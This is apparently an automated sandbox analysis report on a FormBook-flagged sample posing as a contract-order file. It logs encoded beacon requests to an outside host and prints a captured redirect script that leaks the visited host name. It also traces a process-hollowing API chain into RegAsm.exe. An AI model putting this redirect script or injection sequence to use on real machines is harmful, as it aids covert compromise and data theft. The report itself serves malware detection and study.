                                                Content-Type: text/html; charset=utf-8
                                                Accept-Ranges: bytes
                                                Cache-Control: max-age=86400
                                                Age: 1
                                                Connection: Close
                                                Content-Length: 350
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f [TRUNCATED]
                                                Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                12192.168.2.45001423.225.159.42801068C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 07:17:09.407305002 CET525OUTGET /dfeq/?Vblddl=gAXULa6m81FP6NaNWEaqYxdrDcJADutaGDMyuCCNna1Q7N6mqkEUlVDne0yRrfV+N8trXlbxkU4RIowztTRv+FQMMrCoDDJ1FGnXoByL22JcZjp7VwlUZtI=&At=4ZW0 HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-US,en;q=0.9
                                                Host: www.laohub10.net
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                Nov 20, 2024 07:17:10.487343073 CET525INHTTP/1.1 200 OK
                                                Server: Apache
                                                Content-Type: text/html; charset=utf-8
                                                Accept-Ranges: bytes
                                                Cache-Control: max-age=86400
                                                Age: 1
                                                Connection: Close
                                                Content-Length: 350
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f [TRUNCATED]
                                                Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>
                                                Nov 20, 2024 07:17:10.487457991 CET525INHTTP/1.1 200 OK
                                                Server: Apache
                                                Content-Type: text/html; charset=utf-8
                                                Accept-Ranges: bytes
                                                Cache-Control: max-age=86400
                                                Age: 1
                                                Connection: Close
                                                Content-Length: 350
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f [TRUNCATED]
                                                Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                Click to jump to process

                                                Click to jump to process

                                                Click to dive into process behavior distribution

                                                Click to jump to process

                                                Target ID:0
                                                Start time:01:15:03
                                                Start date:20/11/2024
                                                Path:C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe"
                                                Imagebase:0x560000
                                                File size:503'296 bytes
                                                MD5 hash:AB7CE84E9DE63DBE7082872755E8A87C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.1720676508.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                Target ID:1
                                                Start time:01:15:03
                                                Start date:20/11/2024
                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                Imagebase:0x520000
                                                File size:65'440 bytes
                                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2240548681.00000000025C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2239985044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2241932701.0000000002B70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:true

                                                Target ID:5
                                                Start time:01:15:48
                                                Start date:20/11/2024
                                                Path:C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe"
                                                Imagebase:0x540000
                                                File size:140'800 bytes
                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:false

                                                Target ID:6
                                                Start time:01:15:49
                                                Start date:20/11/2024
                                                Path:C:\Windows\SysWOW64\sc.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\SysWOW64\sc.exe"
                                                Imagebase:0xab0000
                                                File size:61'440 bytes
                                                MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2978480170.0000000003630000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2978393331.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:moderate
                                                Has exited:false

                                                Target ID:7
                                                Start time:01:16:02
                                                Start date:20/11/2024
                                                Path:C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe"
                                                Imagebase:0x540000
                                                File size:140'800 bytes
                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:false

                                                Target ID:8
                                                Start time:01:16:14
                                                Start date:20/11/2024
                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                Imagebase:0x7ff6bf500000
                                                File size:676'768 bytes
                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:35.4%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:72
                                                  Total number of Limit Nodes:3
                                                  execution_graph 1566 f13382 1567 f13312 1566->1567 1568 f13387 1566->1568 1567->1566 1571 f126e8 1567->1571 1575 f126dd 1567->1575 1572 f1276f CreateProcessA 1571->1572 1574 f129c4 1572->1574 1576 f1276f CreateProcessA 1575->1576 1578 f129c4 1576->1578 1579 f13305 1580 f13312 1579->1580 1582 f126e8 CreateProcessA 1579->1582 1583 f126dd CreateProcessA 1579->1583 1581 f13387 1580->1581 1584 f126e8 CreateProcessA 1580->1584 1585 f126dd CreateProcessA 1580->1585 1582->1580 1583->1580 1584->1580 1585->1580 1586 f132c6 1590 f12020 1586->1590 1594 f12028 1586->1594 1587 f132db 1591 f1206c ResumeThread 1590->1591 1593 f120b8 1591->1593 1593->1587 1595 f1206c ResumeThread 1594->1595 1597 f120b8 1595->1597 1597->1587 1534 f13bd9 1538 f12110 1534->1538 1542 f12118 1534->1542 1535 f13bf3 1539 f12161 Wow64SetThreadContext 1538->1539 1541 f121d9 1539->1541 1541->1535 1543 f12161 Wow64SetThreadContext 1542->1543 1545 f121d9 1543->1545 1545->1535 1546 f13799 1550 f12360 1546->1550 1554 f12359 1546->1554 1547 f137c7 1551 f123ac WriteProcessMemory 1550->1551 1553 f12445 1551->1553 1553->1547 1555 f123ac WriteProcessMemory 1554->1555 1557 f12445 1555->1557 1557->1547 1598 f135a9 1599 f135b1 1598->1599 1601 f12360 WriteProcessMemory 1599->1601 1602 f12359 WriteProcessMemory 1599->1602 1600 f135e7 1601->1600 1602->1600 1603 f12e09 1604 f12e13 1603->1604 1608 f12240 1604->1608 1612 f12238 1604->1612 1605 f12e4d 1609 f12284 VirtualAllocEx 1608->1609 1611 f122fc 1609->1611 1611->1605 1613 f1222b 1612->1613 1614 f1223f VirtualAllocEx 1612->1614 1613->1605 1616 f122fc 1614->1616 1616->1605 1558 f139b8 1560 f12110 Wow64SetThreadContext 1558->1560 1561 f12118 Wow64SetThreadContext 1558->1561 1559 f139d2 1560->1559 1561->1559 1562 f1345d 1564 f12360 WriteProcessMemory 1562->1564 1565 f12359 WriteProcessMemory 1562->1565 1563 f1347e 1564->1563 1565->1563 1617 f12fcc 1618 f12fd8 1617->1618 1622 f124b0 1618->1622 1626 f124b8 1618->1626 1619 f1300d 1623 f124b8 ReadProcessMemory 1622->1623 1625 f1257c 1623->1625 1625->1619 1627 f12504 ReadProcessMemory 1626->1627 1629 f1257c 1627->1629 1629->1619

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 8 f126dd-f12781 10 f12783-f1279a 8->10 11 f127ca-f127f2 8->11 10->11 16 f1279c-f127a1 10->16 14 f127f4-f12808 11->14 15 f12838-f1288e 11->15 14->15 26 f1280a-f1280f 14->26 24 f12890-f128a4 15->24 25 f128d4-f129c2 CreateProcessA 15->25 17 f127a3-f127ad 16->17 18 f127c4-f127c7 16->18 21 f127b1-f127c0 17->21 22 f127af 17->22 18->11 21->21 23 f127c2 21->23 22->21 23->18 24->25 33 f128a6-f128ab 24->33 44 f129c4-f129ca 25->44 45 f129cb-f12ab0 25->45 27 f12811-f1281b 26->27 28 f12832-f12835 26->28 30 f1281d 27->30 31 f1281f-f1282e 27->31 28->15 30->31 31->31 34 f12830 31->34 35 f128ad-f128b7 33->35 36 f128ce-f128d1 33->36 34->28 38 f128b9 35->38 39 f128bb-f128ca 35->39 36->25 38->39 39->39 41 f128cc 39->41 41->36 44->45 57 f12ac0-f12ac4 45->57 58 f12ab2-f12ab6 45->58 59 f12ad4-f12ad8 57->59 60 f12ac6-f12aca 57->60 58->57 61 f12ab8 58->61 63 f12ae8-f12aec 59->63 64 f12ada-f12ade 59->64 60->59 62 f12acc 60->62 61->57 62->59 66 f12b22-f12b2d 63->66 67 f12aee-f12b17 63->67 64->63 65 f12ae0 64->65 65->63 70 f12b2e 66->70 67->66 70->70
                                                  APIs
                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00F129AF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721653832.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_f10000_New Order - RCII900718_Contract Drafting.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: ca99791d86bb7ade7abe3dc1f1496b64542ffcbf37da32ee03c943d568083d9f
                                                  • Instruction ID: cab3cdf01025206c60306d581a365ca5de3084af6ae69e18dcbf15bf039368ba
                                                  • Opcode Fuzzy Hash: ca99791d86bb7ade7abe3dc1f1496b64542ffcbf37da32ee03c943d568083d9f
                                                  • Instruction Fuzzy Hash: 71C12470D002298FDB24CFA8C841BEEBBB1BF49310F0495AAD849B7250DB749AD5DF95

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 72 f126e8-f12781 74 f12783-f1279a 72->74 75 f127ca-f127f2 72->75 74->75 80 f1279c-f127a1 74->80 78 f127f4-f12808 75->78 79 f12838-f1288e 75->79 78->79 90 f1280a-f1280f 78->90 88 f12890-f128a4 79->88 89 f128d4-f129c2 CreateProcessA 79->89 81 f127a3-f127ad 80->81 82 f127c4-f127c7 80->82 85 f127b1-f127c0 81->85 86 f127af 81->86 82->75 85->85 87 f127c2 85->87 86->85 87->82 88->89 97 f128a6-f128ab 88->97 108 f129c4-f129ca 89->108 109 f129cb-f12ab0 89->109 91 f12811-f1281b 90->91 92 f12832-f12835 90->92 94 f1281d 91->94 95 f1281f-f1282e 91->95 92->79 94->95 95->95 98 f12830 95->98 99 f128ad-f128b7 97->99 100 f128ce-f128d1 97->100 98->92 102 f128b9 99->102 103 f128bb-f128ca 99->103 100->89 102->103 103->103 105 f128cc 103->105 105->100 108->109 121 f12ac0-f12ac4 109->121 122 f12ab2-f12ab6 109->122 123 f12ad4-f12ad8 121->123 124 f12ac6-f12aca 121->124 122->121 125 f12ab8 122->125 127 f12ae8-f12aec 123->127 128 f12ada-f12ade 123->128 124->123 126 f12acc 124->126 125->121 126->123 130 f12b22-f12b2d 127->130 131 f12aee-f12b17 127->131 128->127 129 f12ae0 128->129 129->127 134 f12b2e 130->134 131->130 134->134
                                                  APIs
                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00F129AF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721653832.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_f10000_New Order - RCII900718_Contract Drafting.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: 2bd9b736311ad6e1b0fbb34a20bce9d533143123a95f82ca01f0f1788540ce6c
                                                  • Instruction ID: e10ea12b12e644959eebf567ed0a1e32c37dc962b553feee001ce5a77ef9ea10
                                                  • Opcode Fuzzy Hash: 2bd9b736311ad6e1b0fbb34a20bce9d533143123a95f82ca01f0f1788540ce6c
                                                  • Instruction Fuzzy Hash: 08C12470D002298FDB24CFA8C841BEEBBB1BF49310F0495AAD849B7250DB749AD5DF95

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 136 f12359-f123cb 138 f123e2-f12443 WriteProcessMemory 136->138 139 f123cd-f123df 136->139 141 f12445-f1244b 138->141 142 f1244c-f1249e 138->142 139->138 141->142
                                                  APIs
                                                  • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00F12433
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721653832.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_f10000_New Order - RCII900718_Contract Drafting.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: 9ddf630b0a51344220c2feeae65c8a5403946a98b24a80faf0d88b7c9789d0d2
                                                  • Instruction ID: 8336a42e4ec17e329be8861d9e07798ffe3f5526f912ecdd1e7cec059e985c54
                                                  • Opcode Fuzzy Hash: 9ddf630b0a51344220c2feeae65c8a5403946a98b24a80faf0d88b7c9789d0d2
                                                  • Instruction Fuzzy Hash: A241B8B5D012588FCF00CFA9D984AEEFBF1BB49310F24902AE819B7210C378AA45CF54

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 229 f12360-f123cb 231 f123e2-f12443 WriteProcessMemory 229->231 232 f123cd-f123df 229->232 234 f12445-f1244b 231->234 235 f1244c-f1249e 231->235 232->231 234->235
                                                  APIs
                                                  • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00F12433
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721653832.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_f10000_New Order - RCII900718_Contract Drafting.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: 80735b668fc1f29fe14517ae2a5e91abf4de0cc832335c72342c0a40874f9d59
                                                  • Instruction ID: f154c8ff57f4d6e0c274dc92b9c0972124db75025bc43642ab40c278588c70c7
                                                  • Opcode Fuzzy Hash: 80735b668fc1f29fe14517ae2a5e91abf4de0cc832335c72342c0a40874f9d59
                                                  • Instruction Fuzzy Hash: 0441AAB5D012589FCF00CFA9D984ADEFBF1BB49310F24902AE818B7210D774AA45DF64

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 240 f124b0-f1257a ReadProcessMemory 244 f12583-f125d5 240->244 245 f1257c-f12582 240->245 245->244
                                                  APIs
                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00F1256A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721653832.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_f10000_New Order - RCII900718_Contract Drafting.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessRead
                                                  • String ID:
                                                  • API String ID: 1726664587-0
                                                  • Opcode ID: 08535528b7292c5b08cb87676953d9af3923f1ce5d54c2cf838f685896344514
                                                  • Instruction ID: 5b4b6a89b59190aa9f02908d43e2d0dc979fca20960363a3fb2e522c7dcb2307
                                                  • Opcode Fuzzy Hash: 08535528b7292c5b08cb87676953d9af3923f1ce5d54c2cf838f685896344514
                                                  • Instruction Fuzzy Hash: 4F41BAB5D04258DFCF10CFAAD884ADEFBB1BB49310F14942AE815B7210D774A945CF68

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 250 f12238-f1223d 251 f1222b-f1222c 250->251 252 f1223f-f122fa VirtualAllocEx 250->252 255 f12303-f1234d 252->255 256 f122fc-f12302 252->256 256->255
                                                  APIs
                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00F122EA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721653832.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_f10000_New Order - RCII900718_Contract Drafting.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: d857d08f80423abf0f2bf77225edfc9aa98003ab36b773804495579ca23d295f
                                                  • Instruction ID: f722295777d1e5e1f216204cca24316b4ad9e746276f93695ac06f1e756117ae
                                                  • Opcode Fuzzy Hash: d857d08f80423abf0f2bf77225edfc9aa98003ab36b773804495579ca23d295f
                                                  • Instruction Fuzzy Hash: D241BAB5D002589FCF10CFA9D980ADEFBB1FB49310F10942AE819B7210D735A956DF58

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 261 f124b8-f1257a ReadProcessMemory 264 f12583-f125d5 261->264 265 f1257c-f12582 261->265 265->264
                                                  APIs
                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00F1256A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721653832.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_f10000_New Order - RCII900718_Contract Drafting.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessRead
                                                  • String ID:
                                                  • API String ID: 1726664587-0
                                                  • Opcode ID: c16bead3fae205f013a74cf3b64c2a5eb88c43f843d03f7af79cd5307de85bc9
                                                  • Instruction ID: 18465cf76a96868321c994b42fe3dbcf2d4a20503415c0ef751565fd4003fef2
                                                  • Opcode Fuzzy Hash: c16bead3fae205f013a74cf3b64c2a5eb88c43f843d03f7af79cd5307de85bc9
                                                  • Instruction Fuzzy Hash: CF41CAB5D00258DFCF00CFAAD880AEEFBB1BB09310F14902AE818B7210C774A945CF68

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 270 f12240-f122fa VirtualAllocEx 273 f12303-f1234d 270->273 274 f122fc-f12302 270->274 274->273
                                                  APIs
                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00F122EA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721653832.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_f10000_New Order - RCII900718_Contract Drafting.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: fc0b4513140c718b483deb4af13c2b8d6e3224e15764b863806cef2bd5eb49cf
                                                  • Instruction ID: 75b6a6bdd614f5d28d762e1b0a04257a371a10f7ab205ac53a0114df27595e52
                                                  • Opcode Fuzzy Hash: fc0b4513140c718b483deb4af13c2b8d6e3224e15764b863806cef2bd5eb49cf
                                                  • Instruction Fuzzy Hash: 113188B9D002589FCF10CFA9D980ADEFBB5BB49310F10942AE819B7210D775A946DF68

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 279 f12110-f12178 281 f1217a-f1218c 279->281 282 f1218f-f121d7 Wow64SetThreadContext 279->282 281->282 284 f121e0-f1222c 282->284 285 f121d9-f121df 282->285 285->284
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 00F121C7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721653832.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_f10000_New Order - RCII900718_Contract Drafting.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: 00181f6f374b3efe17ab2c988ad49eb12734fad624e85abcdbd11e434a016bdd
                                                  • Instruction ID: 277b493b5bbf3a71260dabb7b0181271661e89cedd979a64d5106c906b880d4b
                                                  • Opcode Fuzzy Hash: 00181f6f374b3efe17ab2c988ad49eb12734fad624e85abcdbd11e434a016bdd
                                                  • Instruction Fuzzy Hash: 1741CCB4D012589FCB10CFA9D884AEEFFF1AF49310F24802AE459B7244C778A985CF54

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 291 f12118-f12178 293 f1217a-f1218c 291->293 294 f1218f-f121d7 Wow64SetThreadContext 291->294 293->294 296 f121e0-f1222c 294->296 297 f121d9-f121df 294->297 297->296
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 00F121C7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721653832.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_f10000_New Order - RCII900718_Contract Drafting.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: e4667d5a5774eba6abe3e054ead67986aec09f27d42d57e5d42fe09c46c3a597
                                                  • Instruction ID: 2c37283294f870d932168e073fe4c694b61a06fb16a75bba59ab3deb18329e1c
                                                  • Opcode Fuzzy Hash: e4667d5a5774eba6abe3e054ead67986aec09f27d42d57e5d42fe09c46c3a597
                                                  • Instruction Fuzzy Hash: E031BEB5D002589FCB10CFA9D984AEEFBF1BB49310F24802AE418B7240C778A985CF54

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
